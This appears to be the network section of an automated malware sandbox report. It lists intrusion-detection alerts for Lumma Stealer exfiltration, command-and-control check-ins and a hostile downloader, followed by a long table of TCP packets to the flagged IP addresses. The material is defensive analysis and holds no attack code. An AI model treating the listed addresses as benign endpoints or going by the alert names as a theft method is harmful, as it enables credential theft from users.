                                                                                                                                                                        2024-11-24T05:11:24.819017+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749711104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:26.247580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749717104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:28.559552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749723104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:31.081913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749729104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:33.767751+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749736104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:39.218312+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749756104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:39.949887+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749756104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:41.413113+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749761185.215.113.1680TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 24, 2024 05:11:10.395817995 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:10.395821095 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:10.520767927 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:12.615091085 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:12.989543915 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:13.411446095 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                        Nov 24, 2024 05:11:13.739588022 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:15.239463091 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:18.223870993 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:18.409627914 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:18.409662008 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:18.409727097 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:18.415059090 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:18.415076971 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:18.763533115 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:18.763578892 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:18.763655901 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:18.764100075 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:18.764108896 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:19.680964947 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:19.681077957 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:19.684484959 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:19.684505939 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:19.684963942 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:19.739520073 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:19.750150919 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:19.750184059 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:19.750274897 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.005120039 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:20.005708933 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:20.130280018 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:20.382159948 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.382256985 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.382420063 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:20.384393930 CET49703443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:20.384411097 CET44349703104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.473037958 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:20.473077059 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.473170042 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:20.473468065 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:20.473488092 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.551054955 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.551147938 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:20.553710938 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:20.553718090 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.553963900 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:20.561635017 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:20.607341051 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.050949097 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.050977945 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.050992966 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.051203966 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.051219940 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.051379919 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.236644983 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.236720085 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.236747980 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.236761093 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.236793995 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.236793995 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.292068005 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.292138100 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.292154074 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.292164087 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.292206049 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.292220116 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.422545910 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.422595978 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.422631979 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.422643900 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.422703028 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.452224016 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.452270985 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.452320099 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.452327013 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.452383995 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.452383995 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.471771002 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.471831083 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.471976042 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.471976042 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.471985102 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.472049952 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.488656998 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.488706112 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.488787889 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.488795042 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.488943100 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.488943100 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.616214991 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.616274118 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.616316080 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.616323948 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.616374969 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.616374969 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.630040884 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.630084991 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.630148888 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.630155087 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.630199909 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.630199909 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.645878077 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.645926952 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.645996094 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.645996094 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.646007061 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.646130085 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.658931971 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.658948898 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.659013987 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.659020901 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.659049034 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.659061909 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.668752909 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.668770075 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.668828011 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.668833971 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.668874979 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.668874979 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.680690050 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.680706978 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.680778027 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.680783987 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.680800915 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.680850029 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.730211973 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.730278015 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:21.733042955 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:21.733061075 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.733309031 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.735306978 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:21.735395908 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:21.735413074 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.811940908 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.812012911 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.812014103 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.812077045 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.812205076 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.812223911 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.812233925 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.812241077 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.937901020 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.937932968 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.938014030 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.940038919 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.940067053 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.940170050 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.941112041 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.941142082 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.941214085 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.941802979 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.941829920 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.943463087 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.943527937 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.943615913 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.943717003 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.943751097 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.943967104 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.943973064 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.943980932 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.943988085 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.945811987 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.945822954 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:21.945893049 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.946005106 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:21.946010113 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418540001 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418584108 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418617010 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418644905 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418675900 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418680906 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.418719053 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.418747902 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.418767929 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.426734924 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.426831007 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.426898956 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.426908970 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.443423986 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.443558931 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.443598032 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.443608046 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.443661928 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.538223028 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.583290100 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.619514942 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.619648933 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.619750023 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.619751930 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.619839907 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.619961977 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.619992018 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.620008945 CET49705443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.620016098 CET44349705104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.713572979 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.713618994 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:22.713704109 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.714014053 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:22.714025974 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.020742893 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                        Nov 24, 2024 05:11:23.236351013 CET44349702104.98.116.138192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.236527920 CET49702443192.168.2.7104.98.116.138
                                                                                                                                                                        Nov 24, 2024 05:11:23.666016102 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.666594028 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.666609049 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.667128086 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.667133093 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.667182922 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.667665005 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.667678118 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.667992115 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.667995930 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.733187914 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.733671904 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.733694077 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.733969927 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.733975887 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.734102011 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.734359026 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.734380007 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.734731913 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.734740973 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.790559053 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.791070938 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.791098118 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:23.791332006 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:23.791337013 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.025635004 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.025707006 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.027595997 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.027604103 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.027837992 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.029200077 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.029413939 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.029444933 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.100372076 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.100435019 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.100487947 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.100733995 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.100749969 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.100759983 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.100764990 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.101461887 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.101516962 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.101603985 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.101728916 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.101747990 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.101758957 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.101764917 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.103919029 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.103952885 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.104001045 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.104021072 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.104052067 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.104082108 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.104188919 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.104207993 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.104222059 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.104233027 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.177016973 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                        Nov 24, 2024 05:11:24.181462049 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.181484938 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.181569099 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.181600094 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.181904078 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.181940079 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.181982040 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.182095051 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.182138920 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.182188988 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.183135986 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183162928 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183231115 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.183245897 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183299065 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.183418036 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.183424950 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183444977 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.183598995 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183630943 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.183674097 CET49707443192.168.2.713.107.246.63
